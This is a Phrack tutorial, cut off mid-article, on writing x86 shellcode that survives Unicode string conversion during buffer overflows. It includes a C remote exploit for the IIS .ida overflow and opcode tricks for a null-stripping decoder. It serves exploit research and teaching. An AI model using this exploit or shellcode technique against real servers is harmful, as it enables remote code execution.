                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3d, Phile #0x0b of 0x0f

|=------------=[ Building IA32 'Unicode-Proof' Shellcodes ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------=[ obscou <obscou@dr.com||wishkah@chek.com> ]=-------------=|

--[ Contents

  0 - The Unicode Standard

  1 - Introduction

  2 - Our Instructions set

  3 - Possibilities

  4 - The Strategy

  5 - Position of the code

  6 - Conclusion

  7 - Appendix : Code
|
|
|
|
|
|
--[ 0 - The Unicode Standard
|
|
|
|
While exploiting buffer overflows, we sometimes face a difficulty :
character transformations. The exploited program may have modified our
buffer, by converting it to lower or upper case or by stripping
non-alphanumeric characters, thus stopping the attack because our shellcode
usually can't run anymore. The transformation we are dealing with here is
the conversion of a C-type string (common zero terminated string) to a
Unicode string.
|
|
|
|
|
|
Here is a quick overview of what Unicode is (source : www.unicode.org)
|
|
|
|
|
|
"What is Unicode?
|
|
Unicode provides a unique number for every character,
|
|
no matter what the platform,
|
|
no matter what the program,
|
|
no matter what the language."
|
|
|
|
--- www.unicode.org
|
|
|
|
Because the Internet has become so popular, and because we all have
different languages and therefore different characters, there is now a need
for a standard so that computers can exchange data whatever the program,
platform, language or network.
Unicode is a worldwide character-encoding standard designed to cover all
known characters. In the encoding that matters here (the 16-bit form used
by Windows), each ordinary character occupies 16 bits.
|
|
|
|
Today, Unicode is used by many industry leaders such as :
|
|
|
|
Apple
|
|
HP
|
|
IBM
|
|
Microsoft
|
|
Oracle
|
|
Sun
|
|
and many others...
|
|
|
|
The Unicode standard is required by software such as :
(non-exhaustive list, see unicode.org for the full list)
|
|
|
|
Operating Systems :
|
|
|
|
Microsoft Windows CE, Windows NT, Windows 2000, and Windows XP
|
|
GNU/Linux with glibc 2.2.2 or newer - FAQ support
|
|
Apple Mac OS 9.2, Mac OS X 10.1, Mac OS X Server, ATSUI
|
|
Compaq's Tru64 UNIX, Open VMS
|
|
IBM AIX, AS/400, OS/2
|
|
SCO UnixWare 7.1.0
|
|
Sun Solaris
|
|
|
|
And of course, any software that runs under those systems...
|
|
|
|
http://www.unicode.org/charts/ : displays the Unicode table of characters
It looks like this :
|
|
|
|
| Range     | Character set
|-----------|--------------------
| 0000-007F | Basic Latin
| 0080-00FF | Latin-1 Supplement
| 0100-017F | Latin Extended-A
| [...]     | [...]
| 0370-03FF | Greek and Coptic
| [...]     | [...]
| 0590-05FF | Hebrew
| 0600-06FF | Arabic
| [...]     | [...]
| 3040-309F | Japanese Hiragana
| 30A0-30FF | Japanese Katakana
|
|
|
|
|
|
.... and so on until everybody is happy !
|
|
|
|
Unicode 4.0 includes characters for :
|
|
|
|
Basic Latin                           Block Elements
Latin-1 Supplement                    Geometric Shapes
Latin Extended-A                      Miscellaneous Symbols
Latin Extended-B                      Dingbats
IPA Extensions                        Miscellaneous Math. Symbols-A
Spacing Modifier Letters              Supplemental Arrows-A
Combining Diacritical Marks           Braille Patterns
Greek                                 Supplemental Arrows-B
Cyrillic                              Miscellaneous Mathematical Symbols-B
Cyrillic Supplement                   Supplemental Mathematical Operators
Armenian                              CJK Radicals Supplement
Hebrew                                Kangxi Radicals
Arabic                                Ideographic Description Characters
Syriac                                CJK Symbols and Punctuation
Thaana                                Hiragana
Devanagari                            Katakana
Bengali                               Bopomofo
Gurmukhi                              Hangul Compatibility Jamo
Gujarati                              Kanbun
Oriya                                 Bopomofo Extended
Tamil                                 Katakana Phonetic Extensions
Telugu                                Enclosed CJK Letters and Months
Kannada                               CJK Compatibility
Malayalam                             CJK Unified Ideographs Extension A
Sinhala                               Yijing Hexagram Symbols
Thai                                  CJK Unified Ideographs
Lao                                   Yi Syllables
Tibetan                               Yi Radicals
Myanmar                               Hangul Syllables
Georgian                              High Surrogates
Hangul Jamo                           Low Surrogates
Ethiopic                              Private Use Area
Cherokee                              CJK Compatibility Ideographs
Unified Canadian Aboriginal Syllabic  Alphabetic Presentation Forms
Ogham                                 Arabic Presentation Forms-A
Runic                                 Variation Selectors
Tagalog                               Combining Half Marks
Hanunoo                               CJK Compatibility Forms
Buhid                                 Small Form Variants
Tagbanwa                              Arabic Presentation Forms-B
Khmer                                 Halfwidth and Fullwidth Forms
Mongolian                             Specials
Limbu                                 Linear B Syllabary
Tai Le                                Linear B Ideograms
Khmer Symbols                         Aegean Numbers
Phonetic Extensions                   Old Italic
Latin Extended Additional             Gothic
Greek Extended                        Deseret
General Punctuation                   Shavian
Superscripts and Subscripts           Osmanya
Currency Symbols                      Cypriot Syllabary
Combining Marks for Symbols           Byzantine Musical Symbols
Letterlike Symbols                    Musical Symbols
Number Forms                          Tai Xuan Jing Symbols
Arrows                                Mathematical Alphanumeric Symbols
Mathematical Operators                CJK Unified Ideographs Extension B
Miscellaneous Technical               CJK Compatibility Ideographs Supp.
Control Pictures                      Tags
Optical Character Recognition         Variation Selectors Supplement
Enclosed Alphanumerics                Supplementary Private Use Area-A
Box Drawing                           Supplementary Private Use Area-B
|
|
|
|
Yes it's impressive.
|
|
|
|
|
|
Microsoft says :
|
|
|
|
"Unicode is a worldwide character-encoding standard. Windows NT, Windows
|
|
2000, and Windows XP use it exclusively at the system level for character
|
|
and string manipulation. Unicode simplifies localization of software and
|
|
improves multilingual text processing. By implementing it in your
|
|
applications, you can enable the application with universal data exchange
|
|
capabilities for global marketing, using a single binary file for every
|
|
possible character code."
|
|
Note that the Windows programming interface provides an ANSI and a
Unicode version of each API that takes strings, for example:
|
|
|
|
The API : MessageBox (displays a msgbox of course)
|
|
Is exported by User32.dll with :
|
|
MessageBoxA (ANSI)
|
|
MessageBoxW (Unicode)
|
|
|
|
MessageBoxA will accept a standard C-type string as an argument
MessageBoxW requires Unicode strings as arguments.
|
|
|
|
According to Microsoft, strings are handled internally by the system
itself, which ensures a transparent translation of strings between the
different standards.
But if you want to use Unicode in a C program compiled under Windows, you
just have to define UNICODE and every API will be replaced by its 'W'
version.
|
|
This sounds logical to me, let's get to the point now...
|
|
|
|
|
|
|
|
--[ 1 - Introduction
|
|
|
|
|
|
|
|
We will consider the following situation :
|
|
|
|
You send some data to a vulnerable server, and your data is treated as
ASCII (standard 8-bit character encoding). Your buffer is then translated
into Unicode for compatibility reasons, and an overflow occurs with your
transformed buffer.
|
|
|
|
For example, such an input buffer :
|
|
4865 6C6C 6F20 576F 726C 6420 2100 0000 Hello World !...
|
|
0000 0000 0000 0000 0000 0000 0000 0000 ................
|
|
|
|
Would turn into :
|
|
4800 6500 6C00 6C00 6F00 2000 5700 6F00 H.e.l.l.o. .W.o.
|
|
7200 6C00 6400 2000 2100 0000 0000 0000 r.l.d. .!.......
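
The transformation shown above can be modelled in a few lines. This is only
an illustrative sketch: widen and hexdump_words are names made up for this
example, and it assumes every input byte is below 0x80, so that the
conversion simply appends a 0x00 to each byte (what a real conversion
routine does with bytes above 0x7F depends on the code page in use).

```python
def widen(buf: bytes) -> bytes:
    """Model of the ASCII -> 16-bit conversion: a 0x00 follows every byte."""
    out = bytearray()
    for b in buf:
        out += bytes((b, 0x00))
    return bytes(out)


def hexdump_words(buf: bytes) -> str:
    """Format a buffer as space-separated 16-bit groups, like the dump above."""
    return " ".join(buf[i:i + 2].hex().upper() for i in range(0, len(buf), 2))


wide = widen(b"Hello World !")
print(hexdump_words(wide))
```

The printed groups can be compared with the second dump above: each
original byte is now followed by 00, so the buffer is twice as long.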
|
|
|
|
Then bang, overflow (yeah i know my example is stupid)
|
|
|
|
Under Win32 platforms, the code of a process usually starts at 0x00401000,
which makes it possible to smash EIP with a return address that looks like :
|
|
|
|
????:00??00??
|
|
|
|
So even with such a transformation, exploitation is still possible, but
it will be a lot harder to get a working shellcode.
One possibility is to stuff the stack with untransformed data that contains
the same shellcode many times, then do the overflow with the transformed
buffer, and make it return to one of your numerous shellcodes.
Here we assume that this is impossible because all buffers are Unicode.
Needless to say, ordinary assembly code won't go through this safely.
So we need to find a way to build a shellcode that resists such a
transformation. We need to find opcodes containing null bytes to build our
shellcode.
|
|
|
|
Here is an example, it is a bit old but it is an example of how we can
|
|
manage to get a shellcode executed even if our sent buffer is f**cked
|
|
(This exploit was working on my box, it runs against IIS www service) :
|
|
|
|
|
|
---------------- CUT HERE -------------------------------------------------
|
|
|
|
/*
|
|
IIS .IDA remote exploit
|
|
|
|
|
|
formatted return address : 0x00530053
|
|
IIS sticks our very large buffer at 0x0052....
|
|
We jump to the buffer and get to the point
|
|
|
|
|
|
by obscurer
|
|
*/
|
|
|
|
#include <windows.h>
|
|
#include <winsock.h>
|
|
#include <stdio.h>
|
|
|
|
void usage(char *a);
|
|
int wsa();
|
|
|
|
/* My Generic Win32 Shellcode */
|
|
unsigned char shellcode[]={
|
|
"\xEB\x68\x4B\x45\x52\x4E\x45\x4C\x13\x12\x20\x67\x4C\x4F\x42\x41"
|
|
"\x4C\x61\x4C\x4C\x4F\x43\x20\x7F\x4C\x43\x52\x45\x41\x54\x20\x7F"
|
|
[......]
|
|
[......]
|
|
[......]
|
|
"\x09\x05\x01\x01\x69\x01\x01\x01\x01\x57\xFE\x96\x11\x05\x01\x01"
|
|
"\x69\x01\x01\x01\x01\xFE\x96\x15\x05\x01\x01\x90\x90\x90\x90\x00"};
|
|
|
|
int main (int argc, char **argv)
|
|
{
|
|
|
|
int sock;
|
|
struct hostent *host;
|
|
struct sockaddr_in sin;
|
|
int index;
|
|
|
|
char *xploit;
|
|
char *longshell;
|
|
|
|
|
|
char retstring[250];
|
|
|
|
if(argc!=4&&argc!=5) usage(argv[0]);
|
|
|
|
|
|
if(wsa()==FALSE)
|
|
{
|
|
printf("Error : cannot initialize winsock\n");
|
|
exit(0);
|
|
}
|
|
|
|
|
|
int size=0;
|
|
|
|
if(argc==5)
|
|
size=atoi(argv[4]);
|
|
|
|
|
|
printf("Beginning Exploit building\n");
|
|
|
|
xploit=(char *)malloc(40000+size);
|
|
longshell=(char *)malloc(35000+size);
|
|
if(!xploit||!longshell)
|
|
{
|
|
printf("Error, not enough memory to build exploit\n");
|
|
return 0;
|
|
}
|
|
|
|
if(strlen(argv[3])>65)
|
|
{
|
|
printf("Error, URL too long to fit in the buffer\n");
|
|
return 0;
|
|
}
|
|
|
|
for(index=0;index<strlen(argv[3]);index++)
|
|
shellcode[index+139]=argv[3][index]^0x20;
|
|
|
|
memset(xploit,0,40000+size);
|
|
memset(longshell,0,35000+size);
|
|
memset (longshell, '\x41', 30000+size);
|
|
|
|
for(index=0;index<sizeof(shellcode);index++)
|
|
longshell[index+30000+size]=shellcode[index];
|
|
|
|
longshell[30000+sizeof(shellcode)+size]=0;
|
|
|
|
|
|
memset(retstring,'S',250);
|
|
|
|
sprintf(xploit,
|
|
"GET /NULL.ida?%s=x HTTP/1.1\nHost: localhost\nAlex: %s\n\n",
|
|
retstring,
|
|
longshell);
|
|
|
|
|
|
printf("Exploit build, connecting to %s:%d\n",argv[1],atoi(argv[2]));
|
|
|
|
sock=socket(AF_INET,SOCK_STREAM,0);
|
|
if(sock<0)
|
|
{
|
|
printf("Error : Couldn't create a socket\n");
|
|
return 0;
|
|
}
|
|
|
|
|
|
if ((inet_addr (argv[1]))==-1)
|
|
{
|
|
host = gethostbyname (argv[1]);
|
|
if (!host)
|
|
{
|
|
printf ("Error : Couldn't resolve host\n");
|
|
return 0;
|
|
}
|
|
memcpy((unsigned long *)&sin.sin_addr.S_un.S_addr,
|
|
(unsigned long *)host->h_addr,
|
|
sizeof(host->h_addr));
|
|
|
|
}
|
|
else sin.sin_addr.S_un.S_addr=inet_addr(argv[1]);
|
|
|
|
|
|
sin.sin_family=AF_INET;
|
|
sin.sin_port=htons(atoi(argv[2]));
|
|
|
|
index=connect(sock,(struct sockaddr *)&sin,sizeof(sin));
|
|
if (index==-1)
|
|
{
|
|
printf("Error : Couldn't connect to host\n");
|
|
return 0;
|
|
}
|
|
|
|
printf("Connected to host, sending shellcode\n");
|
|
|
|
index=send(sock,xploit,strlen(xploit),0);
|
|
if(index<1)
|
|
{
|
|
printf("Error : Couldn't send trough socket\n");
|
|
return 0;
|
|
}
|
|
|
|
printf("Done, waiting for an answer\n");
|
|
|
|
memset (xploit,0, 2000);
|
|
|
|
index=recv(sock,xploit,100,0);
|
|
if(index<0)
|
|
{
|
|
printf("Server crashed, if exploit didn't work,
|
|
increase buffer size by 10000\n");
|
|
exit(0);
|
|
}
|
|
|
|
|
|
printf("Exploit didn't seem to work, closing connection\n",xploit);
|
|
|
|
closesocket(sock);
|
|
|
|
printf("Done\n");
|
|
|
|
return 0;
|
|
}
|
|
---------------- CUT HERE -------------------------------------------------
|
|
|
|
|
|
In this example, the exploitation string had to be as follows :
|
|
|
|
"GET /NULL.ida?[BUFFER]=x HTTP/1.1\nHost: localhost\nAlex: [ANY]\n\n"
|
|
|
|
If [BUFFER] is big enough, EIP is smashed with what it contains.
But I noticed that [BUFFER] has been transformed into Unicode by the time
the overflow occurs. Interestingly, [ANY] was a clean ASCII buffer, mapped
in memory at around 0x00530000...
So I tried to set [BUFFER] to "SSSSSSSSSSSSS" (S = 0x53).
After the Unicode transformation, it became :
|
|
|
|
...00 53 00 53 00 53 00 53 00 53 00 53 00 53 00 53 00 53...
|
|
|
|
EIP was smashed with 0x00530053, so IIS returned somewhere around [ANY],
where I had put a long run of 0x41 = "A" (which merely increments a
register) and then, at the end of [ANY], my shellcode.
And this worked. But if we have no clean buffer, we are unable to install
a shellcode somewhere in memory. We have to find another solution.
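
To see where a value like 0x00530053 comes from, the widened run of 'S'
characters can be read back as little-endian 32-bit words. The sketch
below is illustrative only; widen is a helper made up for this example,
and the two offsets simply show that the word obtained depends on whether
the read starts on a data byte or on an inserted null.

```python
import struct


def widen(buf: bytes) -> bytes:
    """Append a 0x00 after every byte (model of the Unicode expansion)."""
    return b"".join(bytes((b, 0x00)) for b in buf)


wide = widen(b"S" * 8)

# Read a little-endian dword starting on a data byte, then one byte later.
dword_on_data = struct.unpack_from("<I", wide, 0)[0]
dword_on_null = struct.unpack_from("<I", wide, 1)[0]

print(hex(dword_on_data), hex(dword_on_null))
```

Only the first form has the 00??00?? shape that can point into the low
part of the address space.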
|
|
|
|
|
|
|
|
|
|
--[ 2 - Our Instructions set
|
|
|
|
|
|
|
|
We must keep in mind that we can't use absolute addresses for calls, jumps
and so on, because we want our shellcode to be as portable as possible.
First, we have to know which opcodes can be used and which can't, in order
to find a strategy. As in the Intel manuals :

r32 refers to a 32-bit register (eax, esi, ebp...)
r8 refers to an 8-bit register (ah, bl, cl...)
|
|
|
|
|
|
|
|
- UNCONDITIONAL JUMPS (JMP)
|
|
|
|
JMP's possible opcodes are EB and E9 for relative jumps. We can't use them,
as they must be followed by a displacement (00 would mean a jump to the
next instruction, which is fairly useless).

FF and EA are absolute jumps. These opcodes can't be followed by a 00,
except if we want to jump to a known address, which we won't do as this
would mean that our shellcode contains hardcoded addresses.
|
|
|
|
|
|
|
|
- CONDITIONAL JUMPS (Jcc : JNE, JAE, JL, JZ, JNG, JNS...)

The long form (opcode 0F 8x) can't be used as it needs 2 consecutive
non-null bytes. The short form can't be used either, because the opcode
must be followed by the distance to jump, which won't be 00. Also,
JMP r32 is impossible.
|
|
|
|
|
|
|
|
- LOOPs (LOOP, LOOPcc : LOOPE, LOOPNZ..)
|
|
|
|
Same problem : E0, E1 and E2 are the LOOP opcodes, and they must be
followed by the number of bytes to cross...
|
|
|
|
|
|
- REPEAT (REP, REPcc : REPNE, REPNZ, REP + string operation)
|
|
|
|
All this is impossible because those instructions all begin with a
two-byte opcode.
|
|
|
|
|
|
- CALLs
|
|
|
|
Only the relative call could be useful :
E8 ?? ?? ?? ??
In our case, we must have :
E8 00 ?? 00 ?? (with each ?? != 00)
We can't use this as our call would land at least 0x01000000 bytes
further...
Also, CALL r32 is impossible.
|
|
|
|
|
|
- SET BYTE ON CONDITION (SETcc)
|
|
|
|
This instruction needs 2 non-null bytes. (SETA is 0F 97 for example).
|
|
|
|
|
|
|
|
Uh oh... This is harder than it may seem... We can't do any test, because
we can't do anything conditional ! Moreover, we can't move along our code :
no Jumps and no Calls are permitted, and no Loops nor Repeats can be done.

Then, what can we do ?
The fact that we have a lot of NULLs will allow a lot of operations on the
EAX register, because when you use EAX, [EAX], AX, etc. as an operand,
it is often encoded with a 00.
|
|
|
|
|
|
|
|
- SINGLE BYTE OPCODES
|
|
|
|
We can use any single byte opcode, this will give us any INC or DEC on any
|
|
register, XCHG and PUSH/POP are also possible, with registers as operands.
|
|
So we can do :
|
|
XCHG r32,r32
|
|
POP r32
|
|
PUSH r32
|
|
|
|
Not bad.
|
|
|
|
|
|
- MOV
|
|
________________________________________________________________
|
|
|8800 mov [eax],al |
|
|
|8900 mov [eax],eax |
|
|
|8A00 mov al,[eax] |
|
|
|8B00 mov eax,[eax] |
|
|
| |
|
|
|Quite useless. |
|
|
|________________________________________________________________|
|
|
|
|
________________________________________________________________
|
|
|A100??00?? mov eax,[0x??00??00] |
|
|
|A200??00?? mov [0x??00??00],al |
|
|
|A300??00?? mov [0x??00??00],eax |
|
|
| |
|
|
|These are useless to us. (We said no hardcoded addresses). |
|
|
|________________________________________________________________|
|
|
|
|
________________________________________________________________
|
|
|B_00 mov r8,0x0 |
|
|
|A4 movsb |
|
|
| |
|
|
|Maybe we can use these ones. |
|
|
|________________________________________________________________|
|
|
|
|
________________________________________________________________
|
|
|B_00??00?? mov r32,0x??00??00 |
|
|
|C600?? mov byte [eax],0x?? |
|
|
| |
|
|
|This might be interesting for patching memory. |
|
|
|________________________________________________________________|
|
|
|
|
|
|
|
|
- ADD
|
|
|
|
________________________________________________________________
|
|
|00__ add [r32], r8 |
|
|
| |
|
|
| Using any register as a pointer, we can add bytes in memory. |
|
|
| |
|
|
|00__ add r8,r8 |
|
|
| |
|
|
| Could be a way to modify a register. |
|
|
|________________________________________________________________|
|
|
|
|
|
|
- XOR
|
|
|
|
________________________________________________________________
|
|
|3500??00?? xor eax,0x??00??00 |
|
|
| |
|
|
| |
|
|
| Could be a way to modify the EAX register. |
|
|
|________________________________________________________________|
|
|
|
|
|
|
- PUSH
|
|
|
|
________________________________________________________________
|
|
|6A00 push dword 0x00000000 |
|
|
|6800??00?? push dword 0x??00??00 |
|
|
| |
|
|
| Only this can be made. |
|
|
|________________________________________________________________|
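
The rule applied throughout this section can be checked mechanically. The
sketch below is an illustration under two assumptions that are mine: the
code starts on a data byte (not on an inserted null), and no data byte may
itself be 0x00, since it would end the original C string. The function
name survives_widening is made up for this example; the encodings are
taken from the tables above.

```python
def survives_widening(code: bytes) -> bool:
    """True if `code` has the shape b0 00 b1 00 ... with every b non-null."""
    return all((b == 0) if i % 2 else (b != 0) for i, b in enumerate(code))


candidates = {
    "jmp short (EB 10)":            "EB10",
    "loop (E2 F7)":                 "E2F7",
    "seta (0F 97)":                 "0F97",
    "push dword 0":                 "6A00",
    "mov eax,0xAA004F00":           "B8004F00AA",
    "xor eax,0x12003400":           "3500340012",
    "inc eax / add [ebp+0],al / inc eax": "4000450040",
}

for name, hexcode in candidates.items():
    verdict = "usable" if survives_widening(bytes.fromhex(hexcode)) else "unusable"
    print(f"{hexcode:12} {name:36} {verdict}")
```

An instruction with an odd length, such as the 5-byte mov, ends on a data
byte, so whatever follows it has to begin with a 00.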
|
|
|
|
|
|
--[ 3 - Possibilities
|
|
|
|
|
|
First we have to deal with a small detail : having such 0x00 bytes in our
code requires caution, because if you return from the smashed EIP to
ADDR :
|
|
|
|
... ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ...
|
|
||
|
|
ADDR
|
|
|
|
The result may be completely different if you ret to ADDR or ADDR+1 !
But we can use, as 'NOP' instructions, instructions like :
|
|
|
|
________________________________________________________________
|
|
|0400 add al,0x0 |
|
|
|________________________________________________________________|
|
|
|
|
Because 000400 is add [2*eax],al, we can jump wherever we want : it
doesn't matter whether we land on a 0x00 or not.

But this needs 2*eax to be a valid pointer.
We also have :
|
|
|
|
________________________________________________________________
|
|
|06 push es |
|
|
|0006 add [esi],al |
|
|
| |
|
|
|0F000F str [edi] |
|
|
|000F add [edi],cl |
|
|
| |
|
|
|2E002E add [cs:esi],ch |
|
|
|002E add [esi],ch |
|
|
| |
|
|
|2F das |
|
|
|002F add [edi],ch |
|
|
| |
|
|
|37 aaa |
|
|
|0037 add [edi],dh |
|
|
| ; .... etc etc... |
|
|
|________________________________________________________________|
|
|
|
|
We just have to be careful with this alignment problem.
|
|
|
|
Next, let's see what can be done :
|
|
|
|
XCHG, INC, DEC, PUSH, POP 32 bits registers can be done directly
|
|
|
|
We can set a register (r32) to 00000000 :
|
|
________________________________________________________________
|
|
|push dword 0x00000000 |
|
|
|pop r32 |
|
|
|________________________________________________________________|
|
|
|
|
Notice that anything that can be done with EAX can be done with any other
register thanks to the XCHG instruction.
|
|
|
|
For example we can set EDX to any value with a 0x00 in the second byte
(for example : 0x12005678):
|
|
________________________________________________________________
|
|
|mov edx,0x12005600 ; EDX = 0x12005600 |
|
|
|mov ecx,0xAA007800 |
|
|
|add dl,ch ; EDX = 0x12005678 |
|
|
|________________________________________________________________|
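
The register arithmetic in this box can be followed with a small model.
This is only a sketch: the helper names high8 and add_low8 are invented
for the illustration, registers are plain 32-bit integers, and flags are
ignored.

```python
def high8(reg: int) -> int:
    """Bits 8..15 of a 32-bit register (ah, bh, ch or dh)."""
    return (reg >> 8) & 0xFF


def add_low8(reg: int, value: int) -> int:
    """add r8_low, value: only the low byte changes, the carry is dropped."""
    return (reg & 0xFFFFFF00) | ((reg + value) & 0xFF)


edx = 0x12005600                   # mov edx,0x12005600
ecx = 0xAA007800                   # mov ecx,0xAA007800
edx = add_low8(edx, high8(ecx))    # add dl,ch

print(hex(edx))
```

The top byte of ECX (0xAA here) is never used; it only has to be non-null
so that the immediate keeps its ??00??00 shape.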
|
|
|
|
|
|
More difficult : we can set any value to EAX (for example), but we will
|
|
have to use a little trick with the stack :
|
|
|
|
________________________________________________________________
|
|
|mov eax,0xAA003400 ; EAX = 0xAA003400 |
|
|
|push eax |
|
|
|dec esp |
|
|
|pop eax ; EAX = 0x003400?? |
|
|
|add eax,0x12005600 ; EAX = 0x123456?? |
|
|
|mov al,0x0 ; EAX = 0x12345600 |
|
|
|mov ecx,0xAA007800 |
|
|
|add al,ch |
|
|
| ; finally : EAX = 0x12345678 |
|
|
|________________________________________________________________|
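
The push / dec esp / pop trick shifts the register by one byte through the
stack. The model below is a sketch under stated assumptions: the Stack
class is made up for the illustration, and the unknown byte below the
pushed value (the ?? in the comments above) is arbitrarily taken to be
0xCC.

```python
import struct

MASK32 = 0xFFFFFFFF


class Stack:
    """Tiny little-endian stack; unknown memory is filled with 0xCC."""

    def __init__(self, size: int = 32, fill: int = 0xCC):
        self.mem = bytearray([fill] * size)
        self.esp = size // 2

    def push(self, value: int) -> None:
        self.esp -= 4
        struct.pack_into("<I", self.mem, self.esp, value & MASK32)

    def pop(self) -> int:
        value = struct.unpack_from("<I", self.mem, self.esp)[0]
        self.esp += 4
        return value


stack = Stack()
eax = 0xAA003400                    # mov eax,0xAA003400
stack.push(eax)                     # push eax
stack.esp -= 1                      # dec esp
eax = stack.pop()                   # pop eax  -> 0x003400??
shifted = eax
eax = (eax + 0x12005600) & MASK32   # add eax,0x12005600 -> 0x123456??
eax &= 0xFFFFFF00                   # mov al,0x0
ecx = 0xAA007800                    # mov ecx,0xAA007800
ch = (ecx >> 8) & 0xFF
eax = (eax & 0xFFFFFF00) | ((eax + ch) & 0xFF)   # add al,ch

print(hex(shifted), hex(eax))
```

Whatever the unknown low byte is after the pop, mov al,0x0 clears it, so
the final value does not depend on the previous stack contents.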
|
|
|
|
|
|
Important note : we might want to set some 0x00 too :

If we wanted a 0x00 instead of 0x12, then instead of adding 0x12005600 to
the register, we can simply add 0x56 to ah :
|
|
|
|
________________________________________________________________
|
|
|mov ecx,0xAA005600 |
|
|
|add ah,ch |
|
|
|________________________________________________________________|
|
|
|
|
If we wanted a 0x00 instead of 0x34, then we just need EAX = 0x00000000 to
|
|
begin with, instead of trying to set this 0x34 byte.
|
|
|
|
If we wanted a 0x00 instead of 0x56, then it is simple to subtract 0x56
from ah by adding 0x100 - 0x56 = 0xAA to it :
|
|
________________________________________________________________
|
|
| ; EAX = 0x123456?? |
|
|
|mov ecx,0xAA00AA00 |
|
|
|add ah,ch |
|
|
|________________________________________________________________|
|
|
|
|
If we wanted a 0x00 instead of the last byte, just drop the last two
instructions (mov ecx / add al,ch).
|
|
|
|
In case you haven't thought of this, remember you can jump to a given
location with (assuming the address is in EAX) :
|
|
________________________________________________________________
|
|
|50 push eax |
|
|
|C3 ret |
|
|
|________________________________________________________________|
|
|
|
|
You may use this in case of a desperate situation.
|
|
|
|
|
|
--[ 4 - The Strategy
|
|
|
|
|
|
|
|
It seems nearly impossible to get a working shellcode with such a small set
|
|
of opcodes... But it is not !
|
|
The idea is the following :
|
|
|
|
Given a working shellcode, we must get rid of the 00 between each byte.
|
|
We need a loop, so let's do a loop, assuming EAX points to our shellcode :
|
|
|
|
_Loop_code_:____________________________________________________
|
|
| ; eax points to our shellcode |
|
|
| ; ebx is 0x00000000 |
|
|
| ; ecx is 0x00000500 (for example) |
|
|
| |
|
|
| label: |
|
|
|43 inc ebx |
|
|
|8A1458 mov byte dl,[eax+2*ebx] |
|
|
|881418 mov byte [eax+ebx],dl |
|
|
|E2F7 loop label |
|
|
|________________________________________________________________|
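
What this loop does to memory can be simulated on a byte array. The sketch
below is an illustration, not the author's code: widen and
strip_nulls_in_place are names made up here, EAX is modelled as an index
into the array, and ECX is set to the exact number of bytes to move rather
than to a generous value like 0x500.

```python
def widen(buf: bytes) -> bytes:
    """Append a 0x00 after every byte (model of the Unicode expansion)."""
    return b"".join(bytes((b, 0x00)) for b in buf)


def strip_nulls_in_place(mem: bytearray, eax: int, ecx: int) -> None:
    """Mirror of the loop: copy every second byte down over the nulls."""
    ebx = 0
    while True:
        ebx += 1                     # inc ebx
        dl = mem[eax + 2 * ebx]      # mov dl,[eax+2*ebx]
        mem[eax + ebx] = dl          # mov [eax+ebx],dl
        ecx -= 1                     # loop label
        if ecx == 0:
            break


original = bytes(range(1, 17))       # stand-in for 16 bytes of code
mem = bytearray(widen(original))     # what sits in memory after conversion
strip_nulls_in_place(mem, eax=0, ecx=len(original) - 1)

print(mem[:len(original)].hex())
```

The first byte is already in place, so the loop only has to move the
remaining ones; reads always stay ahead of writes, which is why the copy
can be done in place.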
|
|
|
|
Problem : not unicode. So let's turn it into unicode :
|
|
|
|
43 8A 14 58 88 14 18 E2 F7, would be :
|
|
43 00 14 00 88 00 18 00 F7
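
The bytes lost by this conversion, and therefore the patches needed later,
can be listed automatically. This is a small sketch; the variable names
are mine and the loop bytes are the ones given above.

```python
loop_code = bytes.fromhex("43 8A 14 58 88 14 18 E2 F7")

# Keep the bytes at even offsets, force a 0x00 at every odd offset.
template = bytes(b if i % 2 == 0 else 0x00 for i, b in enumerate(loop_code))

# Each (offset, value) pair is one byte that must be written back at run time.
patches = [(i, b) for i, b in enumerate(loop_code) if i % 2 == 1]

print(template.hex(" ").upper())
for offset, value in patches:
    print(f"offset {offset}: 0x{value:02X}")
```

Four patches are needed, one at each odd offset of the 9-byte loop.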
|
|
|
|
Then, considering the fact that we can write data at a location pointed to
by EAX, it will be simple to transform those 00 into their original values.
|
|
|
|
We just need to do this (we assume EAX points to our data) :
|
|
|
|
________________________________________________________________
|
|
|40 inc eax |
|
|
|40 inc eax |
|
|
|C60058 mov byte [eax],0x58 |
|
|
|________________________________________________________________|
|
|
|
|
Problem : still not Unicode. For two single-byte instructions like 0x40 to
follow each other, we need a 00 between the two... As a lone 00 can't fit,
we need an instruction of the form 00??00 which won't interfere with our
business, so :

add [ebp+0x0],al (0x004500)

will do fine, as long as EBP points to writable memory. Finally we get :
|
|
|
|
________________________________________________________________
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|C60058 mov byte [eax],0x58 |
|
|
|________________________________________________________________|
|
|
|
|
-> [40 00 45 00 40 00 45 00 C6 00 58] is nothing but a unicode string !
|
|
|
|
|
|
Before the loop, we must have some things done :
First we must set a proper counter. I propose to set ECX to 0x0500, which
will deal with a 1280-byte shellcode (but feel free to change this).
->This is easy to do thanks to what we just noticed.
Then we must have EBX = 0x00000000, so that the loop works properly.
->It is also easy to do.
Finally we must have EAX pointing to our shellcode in order to take away
the nulls.
->This will be the hardest part of the job, so we will see that later.
|
|
|
|
Assuming EAX points to our code, we can build a header that will clean the
|
|
code that follows it from nulls (we use add [ebp+0x0],al to align nulls) :
|
|
|
|
-> 1st part : we do EBX=0x00000000, and ECX=0x00000500 (approximate size
of buffer)
|
|
|
|
________________________________________________________________
|
|
|6A00 push dword 0x00000000 |
|
|
|6A00 push dword 0x00000000 |
|
|
|5B pop ebx |
|
|
|004500 add [ebp+0x0],al |
|
|
|59 pop ecx |
|
|
|004500 add [ebp+0x0],al |
|
|
|BA00050041 mov edx,0x41000500 |
|
|
|00F5 add ch,dh |
|
|
|________________________________________________________________|
|
|
|
|
-> 2nd part : The patching of the 'loop code' :
|
|
43 00 14 00 88 00 18 00 F7 has to be : 43 8A 14 58 88 14 18 E2 F7
|
|
So we need to patch 4 bytes exactly which is simple :
|
|
|
|
(N.B : using {add dword [eax],0x00??00??} takes more bytes so we will
|
|
use a single byte mov : {mov byte [eax],0x??} to do this)
|
|
|
|
________________________________________________________________
|
|
|mov byte [eax],0x8A |
|inc eax |
|inc eax |
|mov byte [eax],0x58 |
|inc eax |
|inc eax |
|mov byte [eax],0x14 |
|inc eax |
|inc eax |
|mov byte [eax],0xE2 |
|inc eax |
| ; one more inc to get EAX to the shellcode |
|
|
|________________________________________________________________|
|
|
|
|
